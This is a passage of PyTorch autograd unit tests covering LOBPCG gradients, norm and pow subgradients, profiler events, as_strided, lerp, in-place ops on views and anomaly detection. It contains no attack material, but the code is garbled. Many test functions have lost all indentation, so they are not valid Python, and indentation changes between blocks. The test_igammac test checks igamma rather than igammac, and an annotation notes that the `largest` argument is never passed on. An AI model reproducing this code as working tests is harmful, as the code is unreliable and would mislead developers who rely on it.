    def func(k, A, largest=True, B=None):
        # Deterministic initial eigenspace: first k identity columns,
        # expanded over any batch dimensions of A.
        X_shape = list(A.shape)
        X_shape[-1] = k
        X = torch.eye(A.size(-2), k, dtype=A.dtype, device=A.device)
        if A.dim() > 2:
            X = X.expand(X_shape)

        # NOTE(review): `largest` is accepted but never forwarded to
        # torch.lobpcg below, so the largest=False runs exercise the same
        # default branch as largest=True — confirm whether this is
        # intentional before changing it (it affects convergence).
        D, U = torch.lobpcg(A=A, k=k, B=B, X=X)

        # LOBPCG uses a random initial eigenspace approximation
        # if parameter `X` is not provided.
        # This may cause a non-deterministic behavior
        # when it comes to the sign of an eigenvector
        # (note if v is an eigenvector, so is -v),
        # hence we eliminate this non-determinism
        # by making sure that each column of U
        # gets multiplied by the sign of its max (in absolute value) element.
        # Also, gradcheck changes the content of the input by +/- eps (default to 1e-06)
        # to compute the numerical gradient which can also cause the signs to flip.
        _, idx = U.abs().max(-2, keepdim=True)
        sign = U.gather(-2, idx).sign()
        U = U * sign
        return D, U

    # TODO: review if this can be ported to OpInfos or moved to test_linalg.py
    def run_symeig_test(k, sizes, largest=True):
        # Random symmetric positive semi-definite matrix (or batch).
        A = torch.rand(*sizes).double()
        A = A.matmul(A.transpose(-1, -2)) / 10
        A.requires_grad_(True)

        gradcheck(lambda A: func(k, A, largest), A, check_batched_grad=False)

        # Custom gradient vectors for better stability due to some
        # non-determinism in the lobpcg's forward.
        # Note it is not required if symeig is in forward instead (tested).
        D_grad = torch.rand(*A.shape[:-2], k) / 100
        U_grad = torch.rand(*A.shape[:-1], k) / 100
        gradgradcheck(lambda A: func(k, A, largest), A, [D_grad, U_grad], atol=1e-4, check_batched_grad=False)

        # check whether A.grad is symmetric
        A = A.detach().requires_grad_(True)
        D, U = func(k, A, largest)
        (D.sum() + U.sum()).backward()
        self.assertEqual(A.grad, A.grad.transpose(-1, -2))

    # the tests below take about 1-2 minutes to finish,
    # but we want to be extra sure that the backward is correct.
    for largest in [True, False]:
        run_symeig_test(1, (6, 6), largest=largest)
        run_symeig_test(1, (2, 6, 6), largest=largest)
        run_symeig_test(1, (2, 2, 6, 6), largest=largest)
        run_symeig_test(2, (6, 6), largest=largest)
        run_symeig_test(2, (2, 6, 6), largest=largest)
        run_symeig_test(2, (2, 2, 6, 6), largest=largest)
        run_symeig_test(3, (9, 9), largest=largest)
        run_symeig_test(3, (2, 9, 9), largest=largest)
        run_symeig_test(3, (2, 2, 9, 9), largest=largest)
def test_variable_traverse(self):
def get_out_and_unrefed_cycle():
inp = torch.randn(10, requires_grad=True)
tmp = inp.view(10, 1)
out = tmp.view(10)
# Create a reference cycle that contains an
# intermediary Variable in the graph
my_list = []
my_list.append(tmp)
my_list.append(my_list)
return out
out = get_out_and_unrefed_cycle()
gc.collect()
# This will segfault if things have been erroneously released
out.backward(torch.randn(out.size()))
def test_maximum_and_minimum_subgradient(self):
def run_test(f, a, b, expected_a_grad, expected_b_grad):
a = torch.tensor(a, requires_grad=True)
b = torch.tensor(b, requires_grad=True)
z = f(a, b)
z.sum().backward()
self.assertEqual(a.grad, expected_a_grad)
self.assertEqual(b.grad, expected_b_grad)
run_test(torch.maximum, [0., 1., 2.], [1., 1., 1.], [0., 0.5, 1.], [1., 0.5, 0.])
run_test(torch.minimum, [0., 1., 2.], [1., 1., 1.], [1., 0.5, 0.], [0., 0.5, 1.])
# TODO: norm is deprecated, update these tests and port them to OpInfos
# or test_linalg.py
def test_norm_subgradient(self):
def run_test(input_size, norm_deg):
input = torch.zeros(*input_size, requires_grad=True)
input.norm(norm_deg).backward()
self.assertEqual(input.grad.abs().sum(), 0)
run_test((10,), 2)
run_test((10, 10), 2)
run_test((10,), 3)
run_test((10,), 1)
run_test((10,), 1.5)
run_test((10,), inf)
def test_norm_inf_subgradient(self):
def run_test(input, expected, dim=None):
x = torch.tensor(input, requires_grad=True)
out = x.norm(inf, dim=dim, keepdim=True)
out.backward(torch.ones(out.size()))
self.assertEqual(x.grad, expected)
run_test([0., 0., 0.], [0., 0., 0.])
run_test([1., 0., 1.], [0.5, 0., 0.5])
run_test([[1., 0., 1.], [0., 1., 1.]], [[0.25, 0., 0.25], [0., 0.25, 0.25]])
run_test([[1., 0., 1.], [0., 1., 0.]], [[0.5, 0., 0.5], [0., 1., 0.]], (1,))
run_test(torch.ones((2, 2, 2)), torch.full((2, 2, 2), 0.25), (0, 2))
# TODO: review porting these to OpInfo tests
def test_pow_zero_tensor_gradient(self):
def run_test(input_size, exponent):
input = torch.zeros(*input_size, requires_grad=True)
input.pow(exponent).sum().backward()
self.assertEqual(input.grad.abs().sum(), 0)
run_test((10,), torch.zeros(10))
run_test((10, 10), torch.zeros(10, 10))
run_test((10,), 0)
def test_pow_scalar_base(self):
a = torch.arange(1, 13, dtype=torch.double).view(3, 4).requires_grad_()
gradcheck(lambda a: torch.pow(2, a), (a,))
def test_sinc(self):
# The derivative of sinc(x) at x=0 has to be special cased.
# A naive computation will result in 0/0 -> NaN.
# We also need to be careful when we are very close to 0, as the
# derivative's denominator is squared, and there are some floats
# that are positive and whose squares are zero.
a = torch.tensor([0.0, torch.finfo(torch.double).tiny, 1.0],
dtype=torch.double,
requires_grad=True)
gradcheck(torch.sinc, a)
def test_igamma(self):
# 1e-3 offset to avoid zeros
# NOTE: derivative for s is not implemented
s = (torch.rand(100, dtype=torch.double) + 1e-3)
x = (torch.rand(100, dtype=torch.double) + 1e-3).requires_grad_()
gradcheck(torch.igamma, (s, x))
gradgradcheck(torch.igamma, (s, x))
def test_igammac(self):
# 1e-3 offset to avoid zeros in s
# NOTE: derivative for s is not implemented
s = (torch.rand(100, dtype=torch.double) + 1e-3)
x = (torch.rand(100, dtype=torch.double)).requires_grad_()
gradcheck(torch.igamma, (s, x))
gradgradcheck(torch.igamma, (s, x))
def test_profiler(self):
    """Basic profiler smoke test: aten::mul / aten::add events are
    captured, and _profiler_enabled() tracks the context manager."""
    x = torch.randn(10, 10)

    with profile(use_kineto=kineto_available()) as p:
        self.assertTrue(torch.autograd._profiler_enabled())
        y = x * 2 + 4

    self.assertFalse(torch.autograd._profiler_enabled())

    names = ['aten::mul', 'aten::add']
    found_indices = set()
    for evt in p.function_events:
        if evt.name in names:
            found_indices.add(names.index(evt.name))
    # Fix: assertEquals is a deprecated unittest alias (removed in newer
    # Python versions); use assertEqual.
    self.assertEqual(len(found_indices), len(names))
def test_profiler_seq_nr(self):
    """Forward ops and their backward nodes share sequence numbers.

    aten::add / aten::sum must each carry a sequence number, the matching
    *Backward* events must report the same numbers, and nested ops such
    as aten::empty must not be assigned one.
    """
    with profile(use_kineto=kineto_available()) as p:
        x = torch.randn(10, 10, requires_grad=True)
        y = torch.randn(10, 10, requires_grad=True)
        z = x + y
        s = z.sum()
        s.backward()
    print(p.key_averages().table(
        sort_by="self_cpu_time_total", row_limit=-1))
    # expecting aten::add, aten::sum to have the sequence numbers,
    # expecting the corresponding backward nodes to have the same numbers
    # as the forward ops
    add_seq_nr = -1
    sum_seq_nr = -1
    found_add = found_sum = False
    found_bwd_add = found_bwd_sum = False
    found_empty = False
    for e in p.function_events:
        if e.name == "aten::add":
            add_seq_nr = e.sequence_nr
            # Each forward op should appear exactly once at top level.
            self.assertFalse(found_add)
            found_add = True
        elif e.name == "aten::sum":
            sum_seq_nr = e.sequence_nr
            self.assertFalse(found_sum)
            found_sum = True
        elif "Add" in e.name and "Backward" in e.name:
            self.assertEqual(e.sequence_nr, add_seq_nr)
            self.assertFalse(found_bwd_add)
            found_bwd_add = True
        elif "Sum" in e.name and "Backward" in e.name:
            self.assertEqual(e.sequence_nr, sum_seq_nr)
            self.assertFalse(found_bwd_sum)
            found_bwd_sum = True
        # check that nested ops (e.g. empty) don't have
        # sequence number
        if e.name == "aten::empty":
            self.assertEqual(e.sequence_nr, -1)
            found_empty = True
    self.assertGreaterEqual(add_seq_nr, 0)
    self.assertGreaterEqual(sum_seq_nr, 0)
    self.assertNotEqual(add_seq_nr, sum_seq_nr)
    self.assertTrue(found_add)
    self.assertTrue(found_sum)
    self.assertTrue(found_bwd_add)
    self.assertTrue(found_bwd_sum)
    self.assertTrue(found_empty)
def test_profiler_unboxed_only(self):
    """Profiling an unboxed-only op (resize_) must not crash."""
    t = torch.rand(3, 4)
    with torch.autograd.profiler.profile(use_kineto=kineto_available()) as prof:
        t.resize_([3, 2])
def test_profiler_propagation(self):
    """record_function scopes must propagate across jit fork/wait."""

    def foo(x):
        with record_function("in_foo") as rf:
            return x * 2

    x = torch.rand(3, 4)
    traced_foo = torch.jit.trace(foo, x)

    def bar(x):
        with record_function("in_bar") as rf:
            # we expect that profiler will be able
            # propagate across fork
            fut = torch.jit._fork(traced_foo, x)
            y = torch.jit._wait(fut)
            # note: continuation (and rf's end) can
            # be executed in a different thread
            with record_function("in_bar_after_wait") as rf2:
                y = y * 2
            return y

    traced_bar = torch.jit.trace(bar, x)

    with profile(use_kineto=kineto_available()) as p:
        traced_bar(x)

    found_foo = False
    found_bar = False
    found_bar_after_wait = False
    # Each named scope must appear exactly once in the trace.
    for info in p.function_events:
        if info.name == "in_foo":
            self.assertFalse(found_foo)
            found_foo = True
        elif info.name == "in_bar":
            self.assertFalse(found_bar)
            found_bar = True
        elif info.name == "in_bar_after_wait":
            self.assertFalse(found_bar_after_wait)
            found_bar_after_wait = True
    self.assertTrue(found_foo)
    self.assertTrue(found_bar)
    self.assertTrue(found_bar_after_wait)
def test_record_function_callbacks(self):
    """A user-defined record_function scope shows up with count 1."""
    x = torch.randn(10, 10)
    with profile(use_kineto=kineto_available()) as p:
        with record_function("foo"):
            y = x * 2 + 4

    foo_events = [event for event in p.function_events if "foo" in event.name]
    self.assertEqual(foo_events[0].count, 1)
def test_profiler_aggregation_fake(self):
    """Synthetic FunctionEvents: _populate_cpu_children must nest
    overlapping time ranges correctly, per thread."""
    events = EventList()
    id = [0]

    def get_id():
        # Monotonic id generator (ids start at 1).
        id[0] = id[0] + 1
        return id[0]

    # [[thread_id, [(start, end, id), ....]], ...]
    # Using list instead of a dict so order is guaranteed for any Python
    # version
    threads = [
        [1, [(0, 1, get_id()), (1, 2, get_id())]],
        [0, [(0, 2, get_id()), (1, 2, get_id()), (1, 3, get_id())]],
    ]
    for thread, ranges in threads:
        for range in ranges:
            assert(len(range) == 3)
            events.append(
                FunctionEvent(
                    id=range[2],
                    node_id=0,
                    name="",
                    thread=thread,
                    start_us=range[0],
                    end_us=range[1],
                )
            )

    events._populate_cpu_children()

    # Note that [1, 3] pushes out [0, 2] first. Then we record [1, 2]
    # as a child of [1, 3]
    res = [[], [], [], [], [4]]

    def get_children_ids(event):
        return [child.id for child in event.cpu_children]

    assert([get_children_ids(event) for event in events] == res)
def test_profiler_aggregation_table(self):
    """
    Test if the profiling result is aggregated for `str(prof)`
    See: https://github.com/pytorch/pytorch/issues/37500
    """
    data = torch.randn(1024)
    with torch.autograd.profiler.profile(use_kineto=kineto_available()) as prof:
        torch.einsum("i->", data)

    rendered = str(prof)
    # str(prof) and prof.table() must produce identical aggregated output.
    self.assertEqual(prof.table(), rendered)
def test_profiler_function_event_avg(self):
    """FunctionEventAvg aggregates counts and times, including adding an
    avg to itself (which doubles the accumulated stats)."""
    avg = FunctionEventAvg()
    avg.add(FunctionEvent(id=0, node_id=0, name="foo", thread=0, start_us=10, end_us=15))
    avg.add(FunctionEvent(id=1, node_id=0, name="foo", thread=0, start_us=20, end_us=30))
    # Self-add doubles count (2 -> 4) and total time (15 -> 30).
    avg.add(avg)
    self.assertEqual(avg.key, "foo")

    # aggregate stats
    self.assertEqual(avg.count, 4)
    self.assertEqual(avg.cpu_time_total, 30)
    self.assertEqual(avg.self_cpu_time_total, 30)
    self.assertEqual(avg.cuda_time_total, 0)

    # average stats
    self.assertEqual(avg.cpu_time, 7.5)
    self.assertEqual(avg.cuda_time_total, 0)
def test_profiler_shapes(self):
    """record_shapes=True captures input shapes for aten::linear calls."""
    print("")
    layer1 = torch.nn.Linear(20, 30)
    layer2 = torch.nn.Linear(30, 40)
    input = torch.randn(128, 20)
    with profile(record_shapes=True, use_kineto=kineto_available()) as prof:
        layer2(layer1(input))
    print(prof.function_events)

    # Expected [input, weight, bias] shapes for the two linear layers.
    linear_expected_shapes = [
        [[128, 20], [30, 20], [30]],
        [[128, 30], [40, 30], [40]],
    ]

    found_indices = set()
    for event in prof.function_events:
        if event.name == "aten::linear":
            self.assertTrue(event.input_shapes in linear_expected_shapes)
            found_indices.add(linear_expected_shapes.index(event.input_shapes))
    # Both linear invocations must have been observed.
    self.assertEqual(len(found_indices), len(linear_expected_shapes))
def test_profiler_aggregation_lstm(self):
    """Smoke-test table rendering options and chrome-trace export on an
    LSTM workload; also compares profiler totals against wall-clock."""
    print("")
    rnn = torch.nn.LSTM(10, 20, 2)
    total_time_s = 0
    with profile(record_shapes=True, use_kineto=kineto_available()) as prof:
        for i in range(20):
            input = torch.randn(5, 3, 10)
            h = torch.randn(2, 3, 20)
            c = torch.randn(2, 3, 20)
            start = time.time()
            rnn(input, (h, c))
            end = time.time()
            total_time_s += end - start

    # Exercise the various table() option combinations.
    print(prof.table(
        sort_by="self_cpu_time_total", row_limit=10, header="TEST"))
    print(prof.key_averages(group_by_input_shape=True).table(
        sort_by="self_cpu_time_total", row_limit=10))
    print(prof.table(
        sort_by="self_cpu_time_total", row_limit=10, max_src_column_width=300, header="TEST", top_level_events_only=True))
    print(prof.key_averages(group_by_input_shape=True).table(
        sort_by="self_cpu_time_total", row_limit=10, top_level_events_only=True))

    total_time_us = total_time_s * 1000.0 * 1000.0  # make it us which is profiler default
    print(
        "Total time based on python measurements: ",
        format_time(total_time_us)
    )
    print(
        "CPU time measurement python side overhead: {:.2f}%".format(
            (total_time_us / prof.self_cpu_time_total - 1.0) * 100.0
        )
    )

    # NamedTemporaryFile cannot be re-opened while open on Windows.
    if sys.platform != "win32":
        with tempfile.NamedTemporaryFile() as trace_file:
            prof.export_chrome_trace(trace_file.name)
def test_record_function(self):
    """User record_function scopes interleave in order with aten ops, and
    the decorator form also appears in the profile."""
    x = torch.randn(10, 10)

    def forward(x):
        with record_function("outer"):
            y = x * 2 + 4
            with record_function("inner"):
                y = y - 1
        y = y / 1

    forward(x)

    with profile(use_kineto=kineto_available()) as p:
        forward(x)

    events = p.function_events
    important_events = [
        'outer',
        'aten::mul',
        'aten::add',
        'inner',
        'aten::sub',
        'aten::div'
    ]
    # Scan for the important events appearing in this relative order.
    idx = 0
    for info in events:
        if info.name == important_events[idx]:
            idx = idx + 1
        if idx == len(important_events):
            break
    self.assertEqual(idx, len(important_events))

    # We can also use record_function to decorate arbitrary function
    @record_function('my_func')
    def f(x, y):
        return x + y

    with profile(use_kineto=kineto_available()) as p:
        f(1, 2)

    self.assertTrue('my_func' in str(p))
def test_record_function_multithreaded(self):
    """Entering/exiting overlapping record_function scopes must not throw."""
    outer = record_function("outer")
    outer.__enter__()
    with record_function("inner"):
        # test that exiting the record function after starting another one
        # doesn't throw.
        outer.__exit__(None, None, None)

    with record_function("inner"):
        outer.__enter__()
    # test that exiting the record function after ending another one
    # doesn't throw.
    outer.__exit__(None, None, None)
def test_dir(self):
    """dir(tensor) lists attributes; real/imag only exist where valid."""
    x = torch.randn(10, 10)
    keys = dir(x)
    self.assertIn('shape', keys)

    # real and imag are only implemented for complex tensors.
    # NOTE(review): on newer torch releases .real also works on
    # real-valued tensors, so the assertRaises below is version-specific
    # -- confirm against the targeted torch version.
    y = torch.randn(10, 10, dtype=torch.cfloat)
    for key in ['real', 'imag']:
        # hasattr only swallows AttributeError, so the RuntimeError from
        # accessing .real/.imag on a non-complex tensor propagates.
        self.assertRaises(RuntimeError, lambda: hasattr(x, key))
        self.assertTrue(hasattr(y, key))
        keys.remove(key)

    for key in keys:
        self.assertTrue(hasattr(x, key))
def test_as_strided(self):
    """gradcheck/gradgradcheck as_strided over expanded, overlapping,
    transposed and outside-the-view layouts."""

    def test(x, prepro_fn, size, strides, offset=None):
        x = x.to(torch.double).detach().requires_grad_()

        # Check that forward will **not** resize storage because it may
        # cause NaN in output and fail numerical Jacobian check consequently
        with torch.no_grad():
            y = prepro_fn(x) if prepro_fn is not None else x
            max_offset = sum((si - 1) * st for si, st in zip(size, strides))
            max_offset += offset if offset is not None else y.storage_offset()
            assert max_offset < len(y.storage()), "test case resizes storage"

        def closure(x):
            if prepro_fn is not None:
                x = prepro_fn(x)
            return x.as_strided(size, strides, offset)

        gradcheck(closure, [x])
        gradgradcheck(closure, [x])

    # test
    test(torch.arange(0, 25), lambda x: x.view(5, 5), [3, 3], [6, 2], 2)

    # test crazy stride at dim with size 1 case
    test(torch.randn(12), None, [1, 2, 1, 5], [0, 5, 100, 1], 2)

    # test expand case
    test(torch.randn(5), None, [3, 3, 3], [0, 1, 0], 2)
    test(torch.randn(5), None, [3, 3, 3], [0, 0, 0], 4)
    test(torch.randn(5), lambda x: x.expand(5, 5), [5, 5], [0, 1], 0)

    # test non-expand overlapping case
    test(torch.randn(35), None, [6, 6], [5, 1], 2)
    test(torch.randn(15), None, [3, 2], [3, 6], 2)

    # test transpose case
    test(torch.randn(3, 4), None, [4, 3], [1, 4])

    # test "getting things outside the input" case
    x = torch.randn(6, 2)
    test(x[3:], None, [3, 2], [2, 1], 0)  # should be all zeros
    self.assertEqual(x[3:].as_strided([3, 2], [2, 1], 0), x[:3])

    # test select on expanded input case
    test(torch.randn(2, 3), lambda x: x.expand(10, 2, 3), [2, 3], [3, 1], 0)
# TODO: see if these tests can be ported to OpInfos or moved to
# test_tensor_creation_ops.py
def _test_lerp_tensor_weights(self, cast):
    """gradcheck/gradgradcheck torch.lerp over broadcasting patterns.

    `cast` maps each freshly created tensor (e.g. to a target device).
    """
    def construct_inputs(*shapes):
        start = cast(torch.randn(shapes[0], dtype=torch.double)).requires_grad_()
        end = cast(torch.randn(shapes[1], dtype=torch.double)).requires_grad_()
        weight = cast(torch.randn(shapes[2], dtype=torch.double)).requires_grad_()
        return [start, end, weight]

    all_test_shapes = [((3, 3, 3), (3, 3, 3), (3, 3, 3)),  # no broadcasting
                       ((3,), (3, 3, 3), (3, 3, 3)),  # start broadcasting - 1
                       ((3, 3, 3), (3,), (3, 3, 3)),  # end broadcasting - 1
                       ((3, 3, 3), (3, 3, 3), (3,)),  # weight broadcasting - 1
                       ((), (3, 3, 3), (3, 3, 3)),  # start broadcasting - 2
                       ((3, 3, 3), (), (3, 3, 3)),  # end broadcasting - 2
                       ((3, 3, 3), (3, 3, 3), ()),  # weight broadcasting - 2
                       ((3, 3), (3, 3, 3), (3,))]  # all broadcasting

    for shapes in all_test_shapes:
        cur_inputs = construct_inputs(*shapes)
        gradcheck(torch.lerp, cur_inputs)
        gradgradcheck(torch.lerp, cur_inputs)
def test_lerp_tensor_weights(self):
    """Run the lerp broadcasting checks with the identity cast (CPU)."""
    identity = lambda t: t
    self._test_lerp_tensor_weights(identity)
# TODO: see if these tests can be moved to OpInfos or test_reductions.py
def test_reduce_dtype(self):
    """Gradients of reductions are invariant to an upcast dtype= argument
    and always come back in the input's dtype."""

    def test_reduction(op, has_no_dim, takes_dtype=True):
        x = torch.randn(3, 3, dtype=torch.float, requires_grad=True)
        if has_no_dim:
            # Full reduction: grads with and without dtype=double must match.
            grad1, = torch.autograd.grad([op(x)], [x])
            grad2, = torch.autograd.grad([op(x, dtype=torch.double)], [x])
            self.assertEqual(grad1, grad2)
            self.assertEqual(grad2.dtype, torch.float)

        gi = torch.randn(op(x, dim=0).shape, dtype=torch.float)
        grad1, = torch.autograd.grad([op(x, dim=0)], [x], gi)
        if takes_dtype:
            grad2, = torch.autograd.grad([op(x, dim=0, dtype=torch.double)], [x], gi.double())
        else:
            # Op has no dtype= kwarg; upcast the input instead.
            grad2, = torch.autograd.grad([op(x.double(), dim=0)], [x], gi.double())
        self.assertEqual(grad1, grad2)
        self.assertEqual(grad2.dtype, torch.float)

    test_reduction(torch.sum, True)
    test_reduction(torch.prod, True)
    test_reduction(torch.cumsum, False)
    test_reduction(torch.cumprod, False)
    test_reduction(torch.logcumsumexp, False, takes_dtype=False)
def test_inplace_on_view_saved_output(self):
    """In-place op on a view that saves its output must not leak.

    Test an in-place operation on a view in which the in-place op saves
    its output. Previously, this created a reference cycle.
    """
    dealloc = [0]

    class IncrementOnDelete(object):
        def __del__(self):
            dealloc[0] += 1

    def test():
        root = torch.randn(3, 3, requires_grad=True)
        copy = root.clone()
        # The hook dies with the graph; its __del__ is our evidence that
        # everything was deallocated.
        copy.grad_fn.register_hook(IncrementOnDelete())
        view = copy.view(9)
        torch.nn.functional.relu(view, inplace=True)

    test()
    self.assertEqual(dealloc[0], 1)
def test_inplace_on_view_leaf_errors(self):
# Issue #21875: Fail faster (when we try to modify the view vs. in backward())
x = torch.zeros(1, requires_grad=True)
y = x.view_as(x)
with self.assertRaisesRegex(RuntimeError,
"a view of a leaf Variable that "
"requires grad is being used in "
"an in-place operation."):
y.add_(1)
def test_inplace_on_view_backward(self):
    """Double backward through in-place ops applied to views.

    Issue #10532: Make sure that this does not raise RuntimeError.
    """
    net = nn.Sequential(
        nn.InstanceNorm2d(2),
        nn.ReLU(True)
    )

    x = torch.tensor([[[[1.0, 1.0]]]], requires_grad=True)
    g, = torch.autograd.grad(net(x).pow(2), [x], grad_outputs=x.new_ones(x.shape) , create_graph=True)
    torch.autograd.grad(g.sum(), [x])
    # The input itself must be untouched by the backward passes.
    self.assertEqual(x, torch.tensor([[[[1.0, 1.0]]]]))

    # https://discuss.pytorch.org/t/freeing-buffer-strange-behavior/31955/8
    inputs = torch.ones((1, 3, 256, 256), requires_grad=True)
    tmp1 = (inputs + 1).view_as(inputs)
    tmp2 = torch.nn.functional.threshold(tmp1, 0., 0., True)
    prob_interpolated = torch.sigmoid(tmp2)
    gradients = torch.autograd.grad(outputs=prob_interpolated, inputs=inputs,
                                    grad_outputs=torch.ones(prob_interpolated.size()),
                                    create_graph=True, retain_graph=True)[0]
    gradient_penalty = gradients.sum()
    gradient_penalty.backward()
    # NOTE(review): the node name below is version-specific (newer
    # releases use "ThresholdBackwardBackward0") -- confirm against the
    # targeted torch version.
    fn = gradient_penalty.grad_fn.next_functions[0][0].next_functions[1][0]
    self.assertEqual(fn.name(), "ThresholdBackwardBackward")
def test_inplace_on_view_weak_grad_fn(self):
    """In-place on a view keeps grad_fn alive; leaf views reject in-place.

    Issue 23502: Test that b's grad_fn is preserved.
    """
    a = torch.arange(10.0, requires_grad=True)

    b = a.narrow(0, 0, 2).clone().view(-1)
    b.relu_()

    c = b.clone()
    del b
    gc.collect()

    s = c.sum()
    s.backward()
    # relu_ on [0., 1.] leaves [0., 1.]; the sum is 1.
    self.assertEqual(s, torch.tensor(1.0))

    # Issue #21875: Fail faster (when we try to modify the view vs. in backward())
    a = torch.rand(10, requires_grad=True).narrow(0, 0, 10)
    with self.assertRaises(RuntimeError):
        b = a.relu_()
# TODO: see if these tests can be moved to OpInfo or test_binary_ufuncs.py
def test_mul_out(self):
a = torch.randn(2, 2, requires_grad=True)
b = torch.randn(2, 2, requires_grad=True)
x = torch.zeros_like(a)
# out=... functions don't support automatic differentiation currently
self.assertRaisesRegex(RuntimeError, 'out=', lambda: torch.mul(a, b, out=x))
# the inputs can require grad if we're in no_grad() mode
with torch.no_grad():
torch.mul(a, b, out=x)
self.assertEqual(x, a * b)
def test_mul_out_result_requires_grad(self):
a = torch.randn(2, 2)
b = torch.randn(2, 2)
x = torch.zeros(2, 2, requires_grad=True)
# we should throw an exception if the output requires grad
self.assertRaisesRegex(RuntimeError, 'out=', lambda: torch.mul(a, b, out=x))
# TODO: see if this test can be OpInfo'd or moved to diagonal's test suite
def test_diagonal_derivative_requires_grad(self):
# test that the backward requires grad
# we do this is because diagonal_backward uses inplace
# operations and gradgradcheck does not catch whether
# they works as expected (it will succeed even if
# the gradient has requires_grad == False
a = torch.randn(5, 6, requires_grad=True)
b = torch.diagonal(a)**2
c = b.sum()
d, = torch.autograd.grad(c, a, retain_graph=True, create_graph=True)
self.assertTrue(d.requires_grad)
def test_anomaly_detect_nan(self):
    """detect_anomaly names which backward output went NaN and warns with
    forward-pass information when it was recorded."""
    size = 10

    class MyFunc(Function):
        @staticmethod
        def forward(ctx, inp1, inp2, fail_0th):
            ctx.fail_0th = fail_0th
            return inp1.sum(0, keepdim=True)

        @staticmethod
        def backward(ctx, gO):
            gI = gO.clone().expand(size)
            gI[0] = 0
            gI[0] /= 0  # Generate a nan
            # fail_0th chooses which grad slot carries the NaN.
            if ctx.fail_0th:
                return gI, None, None
            else:
                return None, gI, None

    inp = torch.rand(size, requires_grad=True)
    out = MyFunc.apply(inp, inp, True)
    out.backward()  # Should not fail

    inp = torch.rand(size, requires_grad=True)
    out = MyFunc.apply(inp, inp, True)
    with self.assertRaisesRegex(RuntimeError, "Function 'MyFuncBackward' returned nan values in its 0th output."):
        with warnings.catch_warnings(record=True) as w:
            with detect_anomaly():
                out.backward()
    # Forward ran outside anomaly mode, so no stack was recorded.
    self.assertIn('No forward pass information', str(w[0].message))

    inp = torch.rand(size, requires_grad=True)
    with self.assertRaisesRegex(RuntimeError, "Function 'MyFuncBackward' returned nan values in its 1th output."):
        with warnings.catch_warnings(record=True) as w:
            with detect_anomaly():
                # Forward inside anomaly mode: the warning points at it.
                out = MyFunc.apply(inp, inp, False)
                out.backward()
    self.assertIn('MyFunc.apply', str(w[0].message))
def test_nested_anomaly_detect_nan(self):
    """detect_anomaly in a double-backward (nested) graph names the inner
    function that produced the NaN and reports both forward stacks."""
    size = 10

    class MyFunc(Function):
        @staticmethod
        def forward(ctx, inp1, fail_0th):
            ctx.fail_0th = fail_0th
            ctx.save_for_backward(inp1)
            return inp1.sum(0, keepdim=True)

        @staticmethod
        def backward(ctx, gO):
            inp, = ctx.saved_tensors
            fail_0th = ctx.fail_0th
            g = gO.clone().expand(size)
            # The NaN is produced one level deeper, in MyFunc2's backward.
            gI = MyFunc2.apply(g * inp, g + inp, fail_0th)
            return gI, None

    class MyFunc2(Function):
        @staticmethod
        def forward(ctx, inp1, inp2, fail_0th):
            ctx.fail_0th = fail_0th
            return inp1 * 2.0 + inp2

        @staticmethod
        def backward(ctx, gO):
            fail_0th = ctx.fail_0th
            g1 = gO.clone()
            g2 = gO.clone()
            g1[0] = 0
            g2[0] = 0
            # generate a nan
            if fail_0th:
                g1[0] /= 0
            else:
                g2[0] /= 0
            return g1, g2, None

    inp = torch.rand(size, requires_grad=True)
    out = MyFunc.apply(inp, True)
    ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
    gsum = ginp.sum()
    gsum.backward()  # should not fail

    inp = torch.rand(size, requires_grad=True)
    out = MyFunc.apply(inp, True)
    ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
    gsum = ginp.sum()
    with warnings.catch_warnings(record=True) as w:
        with self.assertRaisesRegex(RuntimeError, "Function 'MyFunc2Backward' returned nan values in its 0th output."):
            with detect_anomaly():
                gsum.backward()
    # w[0] is the anomaly-enabled warning; w[1] the traceback info.
    self.assertIn('No forward pass information', str(w[1].message))

    inp = torch.rand(size, requires_grad=True)
    with warnings.catch_warnings(record=True) as w:
        with self.assertRaisesRegex(RuntimeError, "Function 'MyFunc2Backward' returned nan values in its 1th output."):
            with detect_anomaly():
                # Both forwards run inside anomaly mode, so both stacks
                # are reported (outer MyFunc and inner MyFunc2).
                out = MyFunc.apply(inp, False)
                ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
                gsum = ginp.sum()
                gsum.backward()
    self.assertIn('MyFunc2.apply', str(w[1].message))
    self.assertIn('MyFunc.apply', str(w[2].message))
def test_anomaly_grad_warnings(self):
    """Anomaly-mode warnings are surfaced even when the backward errors.

    PyTorch won't throw warnings if there is an error
    but we'd want to at least see them in stderr.
    """

    class StdErrDiverter:
        # Captures everything written to sys.stderr inside the block.
        def __enter__(self):
            self.stderr_orig = sys.stderr
            self.stderr_new = io.StringIO()
            sys.stderr = self.stderr_new
            return self

        def __exit__(self, *args):
            self.captured = self.stderr_new.getvalue()
            sys.stderr = self.stderr_orig

    # if the warnings don't throw, they will be handled as regular warnings
    with self.assertRaisesRegex(RuntimeError,
                                "one of the variables needed for gradient computation has been "
                                "modified by an inplace operation"):
        with warnings.catch_warnings(record=True) as w:
            with detect_anomaly():
                a = torch.randn(5, requires_grad=True)
                d1 = a + 1
                d2 = d1 ** 2
                d1 += 1
                torch.autograd.grad(d2.sum(), a)

    self.assertEqual(len(w), 2)
    self.assertIn('Anomaly Detection has been enabled', str(w[0].message))
    self.assertIn('Error detected in PowBackward0', str(w[1].message))

    # if the warning throws, it will be printed to sys.stderr
    with self.assertRaisesRegex(RuntimeError,
                                "one of the variables needed for gradient computation has been "
                                "modified by an inplace operation"):
        with warnings.catch_warnings(record=True) as w:
            with detect_anomaly():
                # Turn warnings into errors so the second one diverts to
                # stderr instead of the warning registry.
                warnings.simplefilter("error")
                with StdErrDiverter() as s:
                    a = torch.randn(5, requires_grad=True)
                    d1 = a + 1
                    d2 = d1 ** 2
                    d1 += 1
                    torch.autograd.grad(d2.sum(), a)

    self.assertEqual(len(w), 1)
    self.assertIn('Anomaly Detection has been enabled', str(w[0].message))
    self.assertIn('Error detected in PowBackward0', s.captured)
def test_anomaly_assign_parent_cleanup(self):
    """Anomaly-mode "parent" PyObjects must be released with the graph.

    Test that python objects created are properly cleaned up when
    assign_parent is called.
    """
    import weakref

    def get_ref():
        # we use torch.exp here but any function that will construct a new node in its
        # backward call in grad mode will work
        x = torch.randn(2, 2, requires_grad=True)
        t = x.exp()

        # ExpBackward calls mul, creating the MulBackward node when create_graph=True.
        # In anomaly mode, a PyObject referencing MulBackward's "parent" ExpBackward is added to
